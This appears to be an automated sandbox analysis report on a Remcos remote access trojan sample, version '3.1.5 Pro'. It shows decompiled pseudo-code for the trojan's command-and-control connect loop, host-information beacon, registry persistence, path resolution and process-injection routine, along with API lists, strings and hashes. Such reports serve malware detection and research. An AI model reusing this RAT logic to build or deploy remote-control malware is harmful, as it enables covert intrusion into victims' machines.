                              • Opcode Fuzzy Hash: 1756edb8d8676bbec70d225e95beccb275aa19672e5e980b2ada83bd84d92b62
                              • Instruction Fuzzy Hash: 6132F460B443516BDA15B7729CA7B3E25898B81748F04053FF542BB2E3EEBC9D41839E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 85%
                              			E00411319() {
                              				struct _SECURITY_ATTRIBUTES* _v8;
                              				char _v20;
                              				char _v32;
                              				char _v56;
                              				char _v80;
                              				char _v104;
                              				char _v128;
                              				char _v140;
                              				void* _v163;
                              				char _v164;
                              				char _v188;
                              				char _v212;
                              				char _v236;
                              				char _v260;
                              				char _v284;
                              				char _v308;
                              				char _v332;
                              				char _v356;
                              				char _v380;
                              				char _v404;
                              				char _v428;
                              				char _v452;
                              				char _v476;
                              				char _v500;
                              				char _v524;
                              				char _v548;
                              				char _v572;
                              				char _v596;
                              				char _v620;
                              				char _v644;
                              				char _v668;
                              				char _v692;
                              				char _v716;
                              				char _v740;
                              				char _v764;
                              				char _v788;
                              				char _v812;
                              				char _v836;
                              				char _v860;
                              				char _v884;
                              				char _v908;
                              				char _v932;
                              				char _v956;
                              				char _v980;
                              				char _v1004;
                              				char _v1028;
                              				char _v1052;
                              				char _v1076;
                              				char _v1100;
                              				char _v1124;
                              				char _v1148;
                              				char _v1172;
                              				char _v1196;
                              				char _v1220;
                              				char _v1244;
                              				char _v1268;
                              				char _v1292;
                              				char _v1316;
                              				char _v1340;
                              				char _v1364;
                              				char _v1388;
                              				char _v2388;
                              				signed int _t162;
                              				void* _t164;
                              				long _t168;
                              				void* _t170;
                              				signed char _t174;
                              				void* _t180;
                              				short _t191;
                              				void* _t193;
                              				void* _t194;
                              				void* _t196;
                              				long _t200;
                              				short _t205;
                              				void* _t206;
                              				void* _t208;
                              				void* _t221;
                              				void* _t229;
                              				void* _t230;
                              				void* _t233;
                              				intOrPtr* _t234;
                              				void* _t237;
                              				void* _t238;
                              				void* _t239;
                              				void* _t242;
                              				void* _t244;
                              				void* _t247;
                              				void* _t248;
                              				void* _t249;
                              				void* _t250;
                              				void* _t252;
                              				void* _t253;
                              				void* _t254;
                              				intOrPtr* _t345;
                              				void* _t359;
                              				void* _t361;
                              				void* _t363;
                              				void* _t365;
                              				void* _t367;
                              				long _t371;
                              				void* _t372;
                              				void* _t373;
                              				char* _t393;
                              				void* _t601;
                              				void* _t610;
                              				void* _t660;
                              				signed short _t664;
                              				struct _SECURITY_ATTRIBUTES* _t667;
                              				void* _t677;
                              				void* _t678;
                              				void* _t679;
                              				void* _t680;
                              				void* _t681;
                              				void* _t682;
                              				void* _t683;
                              				void* _t684;
                              				void* _t686;
                              				void* _t687;
                              				void* _t691;
                              				void* _t692;
                              				void* _t693;
                              				void* _t694;
                              				void* _t695;
                              				long _t697;
                              
                              				_push(_t372);
                              				E004020B5(_t372,  &_v104);
                              				L00416934( &_v236, _t601);
                              				E004020B5(_t372,  &_v1388);
                              				_t660 = 0x46c578;
                              				_t162 = E00436079(_t160, L00401F75(L00401E29(0x46c578, _t601, _t695, 0x29)));
                              				if(_t162 != 0) {
                              					_t371 = _t162 * 0x3e8;
                              					_t697 = _t371;
                              					Sleep(_t371);
                              				}
                              				_t678 = _t677 - 0x18;
                              				E00402064(_t372, _t678, 0x4657dc);
                              				_t164 = L00401E29(_t660, _t601, _t697, 0);
                              				_t679 = _t678 - 0x18;
                              				E004020CC(_t372, _t679, _t601, _t697, _t164);
                              				L00416DD0( &_v32, _t601);
                              				_t680 = _t679 + 0x30;
                              				_t667 = 0;
                              				_v8 = 0;
                              				_t373 = 0;
                              				L00401E29(_t660, _t601, _t697, 0x3a);
                              				_t602 = 0x45f6ac;
                              				_t168 = L0040EE79(_t697);
                              				_t698 = _t168;
                              				if(_t168 != 0) {
                              					L00401E29(_t660, 0x45f6ac, _t698, 0x3a);
                              					_t359 = L00402469();
                              					_t361 = L00401F75(L00401E29(_t660, 0x45f6ac, _t698, 0x3a));
                              					L00401E29(_t660, 0x45f6ac, _t698, 0x39);
                              					_t363 = L00402469();
                              					_t365 = L00401F75(L00401E29(_t660, _t602, _t698, 0x39));
                              					L00401E29(_t660, _t602, _t698, 0x38);
                              					_t367 = L00402469();
                              					L00401F75(L00401E29(_t660, _t602, _t698, 0x38));
                              					_t602 = _t367;
                              					L0040484C(_t367, _t365, _t363, _t361, _t359);
                              					_t680 = _t680 + 0x10;
                              					_t667 = 0;
                              				}
                              				L4:
                              				_t681 = _t680 - 0x18;
                              				E00402064(_t373, _t681, 0x4657e0);
                              				_t170 = L00401E29( &_v32, _t602, _t698, _t373);
                              				_t682 = _t681 - 0x18;
                              				E004020CC(_t373, _t682, _t602, _t698, _t170);
                              				L00416DD0( &_v20, _t602);
                              				_t680 = _t682 + 0x30;
                              				L00401E29( &_v20, _t602, _t698, 2);
                              				_t603 = "0";
                              				_t174 = L00405A22("0");
                              				asm("sbb al, al");
                              				 *0x46bae0 =  ~_t174 + 1;
                              				E00404955(0x46c768);
                              				if(_t667 >= 0 || E004021D5( &_v32) > 1) {
                              					_t701 =  *0x46c769 - 1;
                              					_t393 =  &_v104;
                              					if( *0x46c769 != 1) {
                              						_push(0x45f6ac);
                              					} else {
                              						_push(" (TLS)");
                              					}
                              					L004059BE(_t373, _t393);
                              					_t683 = _t680 - 0x18;
                              					_t180 = L00401E29( &_v20, _t603, _t701, 1);
                              					_t602 = L00402F73(_t373,  &_v128, E0040530D(_t373,  &_v56, L004075E8( &_v80, "Connecting to ", _t701, L00401E29( &_v20, _t603, _t701, 0)), _t660, _t701, 0x4657e0), _t701, _t180);
                              					L00402F73(_t373, _t683, _t184, _t701,  &_v104);
                              					_t684 = _t683 - 0x14;
                              					E00402064(_t373, _t684, "[Info]");
                              					L004165D8(_t373, _t660);
                              					_t680 = _t684 + 0x30;
                              					L00401FA7();
                              					L00401FA7();
                              					L00401FA7();
                              					_t667 = _v8;
                              				}
                              				_t191 = 2;
                              				 *0x46bacc = _t191;
                              				_t193 = L00401F75(L00401E29( &_v20, _t602, _t701, 0));
                              				__imp__#52(_t193); // executed
                              				_t702 = _t193;
                              				if(_t193 != 0) {
                              					L00431DF0(0x46bad0,  *((intOrPtr*)( *((intOrPtr*)(_t193 + 0xc)))),  *((short*)(_t193 + 0xa)));
                              					_t205 = E00436079(_t203, L00401F75(L00401E29( &_v20, _t602, _t702, 1)));
                              					__imp__#9();
                              					_t680 = _t680 + 0xc - 0x10;
                              					 *0x46bace = _t205;
                              					asm("movsd");
                              					asm("movsd");
                              					asm("movsd");
                              					asm("movsd");
                              					_t206 = L004049D2(_t602, _t205);
                              					_t703 = _t206;
                              					if(_t206 != 0) {
                              						_t686 = _t680 - 0x18;
                              						_t208 = L00401E29( &_v20, _t602, _t703, 1);
                              						_t610 = L00402F73(_t373,  &_v56, E0040530D(_t373,  &_v188, L004075E8( &_v212, "Connected to  ", _t703, L00401E29( &_v20, _t602, _t703, 0)), 0x46c768, _t703, 0x4657e0), _t703, _t208);
                              						L00402F73(_t373, _t686, _t610, _t703,  &_v104);
                              						_t687 = _t686 - 0x14;
                              						E00402064(_t373, _t687, "[Info]");
                              						L004165D8(_t373, 0x46c768);
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00404E64(0x46c768, 0xa, 0);
                              						_v164 = 0;
                              						asm("stosd");
                              						_v8 = 1;
                              						asm("stosd");
                              						asm("stosd");
                              						asm("stosd");
                              						asm("stosd");
                              						_t221 = L00416852(0x46c768);
                              						_push(_t610);
                              						E00411302( &_v164, "%I64u", _t221);
                              						E00407352(_t373,  &_v128, _t610, _t703, 0x46c3b0);
                              						L0043A6FF( &_v128,  *0x46a9d0,  &_v140, 0xa);
                              						E004020CC(_t373,  &_v80, _t610, _t703, L00401E29(0x46c578, _t610, _t703, 1));
                              						_t229 = L00402469();
                              						_t230 = L00401F75(0x46c560);
                              						_t233 = L00410420(L00401F75(0x46c518), "name",  &_v2388, 0x104, _t230, _t229);
                              						_t691 = _t687 + 0x60;
                              						if(_t233 != 0) {
                              							L004059BE(_t373,  &_v80,  &_v2388);
                              						}
                              						_t234 =  *0x46bd44; // 0x0
                              						_t664 = 0;
                              						_t705 = _t234;
                              						if(_t234 != 0) {
                              							_t664 =  *_t234() & 0x0000ffff;
                              						}
                              						E0040425F(_t373,  &_v56, "C:\Windows\SysWOW64\mobsync.exe");
                              						_t692 = _t691 - 0x18;
                              						_t237 = L00416CF4(_t373,  &_v1364, 0x46c500);
                              						_t238 = L00416B7E(_t373,  &_v1340, _t664 & 0x0000ffff);
                              						_t239 = L00401E29( &_v20, _t664 & 0x0000ffff, _t705, 0);
                              						_t242 = L00416B7E(_t373,  &_v1316, GetTickCount());
                              						_t244 = L00416B7E(_t373,  &_v1292, L00416B2E( &_v1316));
                              						_t247 = L00416CF4(_t373,  &_v1244, L00416AF4( &_v1268));
                              						_t248 = L00416CF4(_t373,  &_v1220, 0x46c0e0);
                              						_t249 = L00416CF4(_t373,  &_v1196,  &_v56);
                              						_t250 = L00416CF4(_t373,  &_v1172,  &_v128);
                              						_t252 = L00416CF4(_t373,  &_v1148, 0x46c868);
                              						_t253 = L0040D585( &_v1124);
                              						_t254 = L00416CF4(_t373,  &_v1100, 0x46c584);
                              						_t602 = L00402F73(_t373,  &_v212, L00402EFD( &_v188, L00402F73(_t373,  &_v260, L00402EFD( &_v284, L00402F73(_t373,  &_v308, L00402F73(_t373,  &_v332, L00402F73(_t373,  &_v356, L00402F73(_t373,  &_v380, L00402F73(_t373,  &_v404, E0040530D(_t373,  &_v428, L00402F73(_t373,  &_v452, L00402EFD( &_v476, L00402F73(_t373,  &_v500, L00402EFD( &_v524, L00402F73(_t373,  &_v548, L0040759E(_t373,  &_v572, L00402F73(_t373,  &_v596, L00402EFD( &_v620, L00402F73(_t373,  &_v644, L00402EFD( &_v668, L00402F73(_t373,  &_v692, L00402EFD( &_v716, L00402F73(_t373,  &_v740, L00402EFD( &_v764, L00402F73(_t373,  &_v788, E0040530D(_t373,  &_v812, L00402F73(_t373,  &_v836, E0040530D(_t373,  &_v860, L00402F73(_t373,  &_v884, L00402EFD( &_v908, L00402F73(_t373,  &_v932, L00402F73(_t373,  &_v956, L00402F73(_t373,  &_v980, L00402EFD( &_v1004, L00402F73(_t373,  &_v1028, L00402EFD( &_v1052, L00402F97( &_v1076,  &_v80, 0x46c238), _t254), _t705, 0x46c238), _t253), _t705, 0x46c238), _t705, 0x46c5b4), _t705, 0x46c238), _t252), _t705, 0x46c238), 0x46c238, _t705,  &_v164), _t705, 0x46c238), 0x46c238, _t705, "3.1.5 Pro"), _t705, 0x46c238), _t250), _t705, 0x46c238), _t249), _t705, 0x46c238), _t248), _t705, 0x46c238), _t247), _t705, 0x46c238), 0x46c238, _t705,  *0x46a9d4 & 0x000000ff), _t705, 0x46c238), _t244), _t705, 0x46c238), _t242), _t705, 0x46c238), 0x46c238, _t705,  &_v140), _t705, 0x46c238), _t705, _t239), _t705, 0x46c238), _t705, "Remcos-8VTGWT"), _t705, 0x46c238), _t238), _t705, 0x46c238), _t237), _t705, 0x46c238);
                              						L00402F73(_t373, _t692, _t291, _t705,  &_v236);
                              						_push(0x4b);
                              						L00404A6E(_t373, 0x46c768, _t291, _t705);
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401ED0();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401FA7();
                              						L00401ED0();
                              						L00404B88(0x46c768, _t291, 0x411d70, 1);
                              						_t345 =  *0x46bd48; // 0x0
                              						if(_t345 != 0 &&  *0x46bd4d != 0) {
                              							_t345 =  *_t345();
                              							 *0x46bd4d = 0;
                              						}
                              						if( *0x46c39a != 0) {
                              							_t345 = L00409520(_t373, 0x46c350);
                              						}
                              						L00405978(_t345);
                              						_t693 = _t692 - 0x18;
                              						E00402064(_t373, _t693, "Disconnected!");
                              						_t694 = _t693 - 0x18;
                              						E00402064(_t373, _t694, "[Info]");
                              						L004165D8(_t373, 0x46c238);
                              						_t680 = _t694 + 0x30;
                              						if( *0x46bea4 != 0) {
                              							CreateThread(0, 0, E0041601E, 0, 0, 0);
                              						}
                              						L00401FA7();
                              						L00401ED0();
                              					}
                              					_t667 = _v8;
                              					_t660 = 0x46c578;
                              				}
                              				_t667 = _t667 - 1;
                              				_v8 = _t667;
                              				_t373 = _t373 + 1;
                              				_t194 = E004021D5( &_v32);
                              				_t711 = _t373 - _t194;
                              				if(_t373 >= _t194) {
                              					_t196 = 2;
                              					_t373 = 0;
                              					_t200 = E00436079(_t197, L00401F75(L00401E29(_t660, _t602, _t711, _t196))) * 0x3e8;
                              					_t698 = _t200;
                              					Sleep(_t200); // executed
                              				}
                              				L00401E54( &_v20, _t602);
                              				goto L4;
                               			}

                              APIs
                              • Sleep.KERNEL32(00000000,00000029,73B743E0,0046C578,00000000), ref: 0041136A
                                • Part of subcall function 004165D8: GetLocalTime.KERNEL32(00000000), ref: 004165F2
                              • gethostbyname.WS2_32(00000000), ref: 0041155B
                              • htons.WS2_32(00000000), ref: 00411599
                              • Sleep.KERNELBASE(00000000,00000002), ref: 00411D5D
                                • Part of subcall function 00410420: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,0046C518), ref: 0041043C
                                • Part of subcall function 00410420: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00410455
                                • Part of subcall function 00410420: RegCloseKey.ADVAPI32(00000000), ref: 00410460
                              • GetTickCount.KERNEL32 ref: 0041178B
                                • Part of subcall function 00404A6E: send.WS2_32(?,00000000,00000000,00000000), ref: 00404AE2
                              • CreateThread.KERNEL32(00000000,00000000,0041601E,00000000,00000000,00000000), ref: 00411D0C
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: Sleep$CloseCountCreateLocalOpenQueryThreadTickTimeValuegethostbynamehtonssend
                              • String ID: (TLS)$%I64u$3.1.5 Pro$C:\Windows\SysWOW64\mobsync.exe$Connected to $Connecting to $Disconnected!$Remcos-8VTGWT$[Info]$name
                              • API String ID: 2130001850-3107917961
                              • Opcode ID: 453a725cf9e8c8a0c3275ea6f381c23dcfb53096a435ff95b8df44e628af73f6
                              • Instruction ID: 83ef738f165b9044fa0b5899371646b5f38477a05a31d0d6adf18a21a94f173f
                              • Opcode Fuzzy Hash: 453a725cf9e8c8a0c3275ea6f381c23dcfb53096a435ff95b8df44e628af73f6
                              • Instruction Fuzzy Hash: CF427E71A002155ACB18F761DC56EEEB365AB50308F5041BFB40AB71E2EF7C5F86CA89
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 84%
                              			E004179B3(void* __ecx, void* __edx, intOrPtr _a4) {
                              				char _v524;
                              				char _v544;
                              				char _v560;
                              				char _v572;
                              				void* _v576;
                              				char _v580;
                              				char _v584;
                              				char _v600;
                              				char _v608;
                              				char _v616;
                              				char _v620;
                              				void* _v624;
                              				char _v628;
                              				char _v632;
                              				char _v636;
                              				char _v644;
                              				void* _v648;
                              				char _v652;
                              				void* _v672;
                              				void* __ebx;
                              				signed int _t36;
                              				void* _t39;
                              				void* _t40;
                              				void* _t77;
                              
                              				_t73 = __edx;
                              				_t77 = __ecx;
                              				_t54 = __edx;
                              				L00401F4D(__edx,  &_v644);
                              				_t36 = __edx + 0xffffffd0;
                              				_t85 = _t36 - 7;
                              				if(_t36 <= 7) {
                              					switch( *((intOrPtr*)(_t36 * 4 +  &M00417B8F))) {
                              						case 0:
                              							_push(L"Temp");
                              							goto L14;
                              						case 1:
                              							__ecx =  &_v620;
                              							__eax = L0041669D(__ebx,  &_v620);
                              							__ecx =  &_v644;
                              							__eax = L00401EDA( &_v644, __edx, __esi, __eax);
                              							goto L4;
                              						case 2:
                              							_push(L"SystemDrive");
                              							goto L14;
                              						case 3:
                              							_push(L"WinDir");
                              							goto L14;
                              						case 4:
                              							__eax = L00416F6C(__ecx);
                              							__eflags = __al;
                              							if(__eflags != 0) {
                              								__ecx =  &_v620;
                              								E0040425F(__ebx, __ecx, L"\\SysWOW64") = E0043918F(__ebx, __ecx, __eflags, L"WinDir");
                              								__ecx =  &_v600;
                              								__edx = __eax;
                              								__ecx =  &_v580;
                              								__eax = E00403010( &_v580, __edx, __eax);
                              								__ecx =  &_v652;
                              								__eax = L00401EDA( &_v652, __edx, __esi, __eax);
                              								__ecx =  &_v584;
                              								__eax = L00401ED0();
                              								__ecx =  &_v608;
                              								__eax = L00401ED0();
                              								L4:
                              								__ecx =  &_v620;
                              								goto L5;
                              							} else {
                              								__ecx =  &_v572;
                              								E0040425F(__ebx, __ecx, L"\\system32") = E0043918F(__ebx, __ecx, __eflags, L"WinDir");
                              								__ecx =  &_v600;
                              								__edx = __eax;
                              								__ecx =  &_v628;
                              								__eax = E00403010( &_v628, __edx, __eax);
                              								__ecx =  &_v652;
                              								__eax = L00401EDA( &_v652, __edx, __esi, __eax);
                              								__ecx =  &_v632;
                              								__eax = L00401ED0();
                              								__ecx =  &_v608;
                              								__eax = L00401ED0();
                              								__ecx =  &_v584;
                              								L5:
                              								__eax = L00401ED0();
                              								goto L15;
                              							}
                              							L16:
                              						case 5:
                              							_push(L"ProgramFiles");
                              							goto L14;
                              						case 6:
                              							_push(L"AppData");
                              							goto L14;
                              						case 7:
                              							_push(L"UserProfile");
                              							L14:
                              							L00409DCB(_t54,  &_v644, E0043918F(_t54, _t57, _t85));
                              							goto L15;
                              					}
                              				}
                              				L15:
                              				__imp__GetLongPathNameW(L00401ECB( &_v644),  &_v524, 0x208); // executed
                              				_t39 = E0040425F(_t54,  &_v560, _a4);
                              				_t40 = E0040425F(_t54,  &_v636, "\\");
                              				E00403010(_t77, E00403010( &_v600, L00417D4C(_t54,  &_v616, _t73, _t85,  &_v544, _t38), _t40), _t39);
                              				L00401ED0();
                              				L00401ED0();
                              				L00401ED0();
                              				L00401ED0();
                              				L00401ED0();
                              				return _t77;
                              				goto L16;
                               			}

                              APIs
                              • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 00417B0A
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: LongNamePath
                              • String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                              • API String ID: 82841172-1609423294
                              • Opcode ID: 35c28d9923312f15828796b161f12df378b3fca9c55578f31d1e83ebc7bc6e77
                              • Instruction ID: 6472f6f80a3df67a90006e08033efa2a9a0bfe3ce3822e9bff2fa4fccbff765a
                              • Opcode Fuzzy Hash: 35c28d9923312f15828796b161f12df378b3fca9c55578f31d1e83ebc7bc6e77
                              • Instruction Fuzzy Hash: 224126711082005AC314FB62DC52DEFB3A9AE90798F10093FF556620E2EE789F49C69B
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 77%
                              			E00410497(void* __ecx, char* __edx, char* _a4, char _a8, int _a32) {
                              				void* _v8;
                              				long _t12;
                              				int _t15;
                              				long _t17;
                              				signed int _t19;
                              				signed int _t20;
                              
                              				_push(__ecx);
                              				_push(_t19);
                              				_t12 = RegCreateKeyA(0x80000001, __edx,  &_v8); // executed
                              				if(_t12 != 0) {
                              					_t20 = 0;
                              				} else {
                              					_t15 = L00402469();
                              					_t17 = RegSetValueExA(_v8, _a4, 0, _a32, L00401F75( &_a8), _t15); // executed
                              					RegCloseKey(_v8);
                              					_t20 = _t19 & 0xffffff00 | _t17 == 0x00000000;
                              				}
                              				L00401FA7();
                              				return _t20;
                              			}

                              APIs
                              • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004104A6
                              • RegSetValueExA.KERNELBASE(?,0046062C,00000000,?,00000000,00000000,0046C518,?,?,0040D501,0046062C,3.1.5 Pro), ref: 004104CE
                              • RegCloseKey.ADVAPI32(?,?,?,0040D501,0046062C,3.1.5 Pro), ref: 004104D9
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: CloseCreateValue
                              • String ID:
                              • API String ID: 1818849710-0
                              • Opcode ID: a8bc24b0db01374bc919d6c9d6992345ff6f38f3f877acf754395c2b83bdb208
                              • Instruction ID: 9045ae6a7ebcd238780a3c55024b685f51bb899022283947814aae02ff94998e
                              • Opcode Fuzzy Hash: a8bc24b0db01374bc919d6c9d6992345ff6f38f3f877acf754395c2b83bdb208
                              • Instruction Fuzzy Hash: ECF09672500208FFCB009FA1DD45EEE376CEF04751F108166BD05A61A1E7759F54DA94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00410275(char* __edx, char* _a4, char* _a8) {
                              				void* _v8;
                              				int _v12;
                              				int _v16;
                              				int _t12;
                              				long _t14;
                              				long _t18;
                              
                              				_t12 = 4;
                              				_v12 = _t12;
                              				_v16 = _t12;
                              				_t14 = RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v8); // executed
                              				if(_t14 != 0) {
                              					return 0;
                              				}
                              				_t18 = RegQueryValueExA(_v8, _a4, 0,  &_v16, _a8,  &_v12);
                              				return RegCloseKey(_v8) & 0xffffff00 | _t18 == 0x00000000;
                              			}

                              APIs
                              • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00410295
                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,0046C518), ref: 004102B3
                              • RegCloseKey.ADVAPI32(?), ref: 004102BE
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: CloseOpenQueryValue
                              • String ID:
                              • API String ID: 3677997916-0
                              • Opcode ID: 6020211f2f41a99924b2582c1e80447f15e98d83b67fb738d9560e140564669e
                              • Instruction ID: da35563d8025d65dfadb3f1a4e24c633330656b2ed15e4664ff05724ceb20d8f
                              • Opcode Fuzzy Hash: 6020211f2f41a99924b2582c1e80447f15e98d83b67fb738d9560e140564669e
                              • Instruction Fuzzy Hash: 90F01D7690030CBFDF109FA09D05BEE7BBCEB04B51F1040A5FE04E6195D2719B549B94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 37%
                              			E00404955(char* __ecx) {
                              				intOrPtr _t8;
                              				char _t13;
                              				char* _t14;
                              
                              				_t14 = __ecx;
                              				if( *0x46baab != 0) {
                              					L3:
                              					__imp__#23(0, 1, 6); // executed
                              					 *((intOrPtr*)(_t14 + 4)) = _t8;
                              					if(_t8 == 0xffffffff) {
                              						L2:
                              						return 0;
                              					}
                              					_t13 =  *0x46bae0; // 0x0
                              					 *((char*)(_t14 + 0x50)) = 0;
                              					 *((intOrPtr*)(_t14 + 0x54)) = 0;
                              					 *((intOrPtr*)(_t14 + 0x4c)) = 0x3e8;
                              					 *((char*)(_t14 + 0x65)) = 0;
                              					 *((char*)(_t14 + 1)) = _t13;
                              					 *((intOrPtr*)(_t14 + 0x44)) = 0;
                              					 *_t14 = 1;
                              					return 1;
                              				}
                              				_t8 = E004049A8(); // executed
                              				if(_t8 != 0) {
                              					goto L3;
                              				}
                              				goto L2;
                              			}

                              APIs
                              • socket.WS2_32(00000000,00000001,00000006), ref: 00404976
                                • Part of subcall function 004049A8: WSAStartup.WS2_32(00000202,00000000), ref: 004049BD
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: Startupsocket
                              • String ID:
                              • API String ID: 3996037109-0
                              • Opcode ID: 57deaf7df3839363482a97d4bb077c46ff9157abd3d4fca2155b12ae97433c1f
                              • Instruction ID: 62ee2057d8b28695902b4436e4315656a2426cea2330156b944394806be68f62
                              • Opcode Fuzzy Hash: 57deaf7df3839363482a97d4bb077c46ff9157abd3d4fca2155b12ae97433c1f
                              • Instruction Fuzzy Hash: 5FF0BEF04057905ED7318F385884397BFD49B52318F04497EE2D2A37C2D2B96405876A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • WSAStartup.WS2_32(00000202,00000000), ref: 004049BD
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: Startup
                              • String ID:
                              • API String ID: 724789610-0
                              • Opcode ID: ac0fcd44a18d9d81a3d82cc89e4d091a56d1cbdc41663de66bf519bb87ef27f6
                              • Instruction ID: c6028f311036b87a725e3855d38eddd9b01408ba72ab7eba5a9d2c49baa38117
                              • Opcode Fuzzy Hash: ac0fcd44a18d9d81a3d82cc89e4d091a56d1cbdc41663de66bf519bb87ef27f6
                              • Instruction Fuzzy Hash: 01D0123255860C4ED611AAB4AC0F8A5775CC317612F4003BAACB5C25D3F650571CC2FB
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              C-Code - Quality: 97%
                              			E0040D1AD(void* __eflags, char _a4) {
                              				void* _v8;
                              				char _v32;
                              				char _v56;
                              				char _v60;
                              				char _v64;
                              				char _v68;
                              				char _v72;
                              				char _v96;
                              				char _v120;
                              				char _v648;
                              				intOrPtr _v676;
                              				void* _v684;
                              				short _v1204;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* _t76;
                              				struct _SECURITY_ATTRIBUTES* _t106;
                              				char* _t111;
                              				void* _t158;
                              				void* _t161;
                              
                              				_t106 = 0;
                              				GetModuleFileNameW(0,  &_v1204, 0x104);
                              				_t149 = "1";
                              				if(L00407746("1") != 0) {
                              					L14:
                              					L00401EDA( &_a4, _t149, _t159, L00416773(_t106,  &_v120, _t149));
                              					_t111 =  &_v120;
                              					L00401ED0();
                              					if(L00416F6C(_t111) != 0) {
                              						_push(_t111);
                              						if(L0040D84F( &_a4, L"Program Files\\") != 0xffffffff) {
                              							L0040D870(_t106,  &_a4, _t157, _t73, 0xe, L"Program Files (x86)\\");
                              						}
                              					}
                              					if(L0040EE85( &_v1204,  &_a4) != 0) {
                              						L22:
                              						L00401ED0();
                              						return _t106;
                              					} else {
                              						L18:
                              						_t158 = CreateMutexA(_t106, 1, "Remcos_Mutex_Inj");
                              						E004020B5(_t106,  &_v96);
                              						E00417334(L00401ECB(0x46c500),  &_v96);
                              						L00401F75( &_v96);
                              						if(L00413CCA(L00401ECB( &_a4)) == 0) {
                              							CloseHandle(_t158);
                              						} else {
                              							_t106 = 1;
                              							L004105A0(0x46c518, L00401F75(0x46c518), "Inj", 1);
                              						}
                              						L00401FA7();
                              						goto L22;
                              					}
                              				}
                              				L00401F4D(0,  &_v32);
                              				_t76 = CreateToolhelp32Snapshot(2, 0);
                              				_v8 = _t76;
                              				_v684 = 0x22c;
                              				Process32FirstW(_t76,  &_v684);
                              				while(Process32NextW(_v8,  &_v684) != 0) {
                              					E0040425F(_t106,  &_v56,  &_v648);
                              					_t157 = E004022EA( &_v56,  &_v60);
                              					_t159 = E004022AD( &_v56,  &_v64);
                              					E00408228( &_v72,  *((intOrPtr*)(E004022EA( &_v56,  &_v68))),  *_t84,  *_t82);
                              					_t161 = _t161 + 0xc;
                              					if(L00409EAE( &_a4) != 0) {
                              						L00401EDA( &_v32, _v676, _t159, L00416FD0( &_v120, _v676));
                              						L00401ED0();
                              						if(L00407746( &_v1204) == 0) {
                              							_t149 = 0x45f714;
                              							if(L00407746(0x45f714) != 0 || L00416F9A(_v676) != 0) {
                              								L00401ED0();
                              								L13:
                              								L00401ED0();
                              								goto L14;
                              							} else {
                              								L00409E58( &_v32);
                              								L00401ED0();
                              								break;
                              							}
                              						}
                              						L00401ED0();
                              						L00401ED0();
                              						goto L22;
                              					}
                              					L00401ED0();
                              				}
                              				CloseHandle(_v8);
                              				_t149 = 0x45f714;
                              				if(L00407746(0x45f714) != 0) {
                              					goto L13;
                              				}
                              				L00401ED0();
                              				goto L18;
                              			}

                              APIs
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,0046C578,00000000,00000001), ref: 0040D1C8
                              • CreateToolhelp32Snapshot.KERNEL32 ref: 0040D1EE
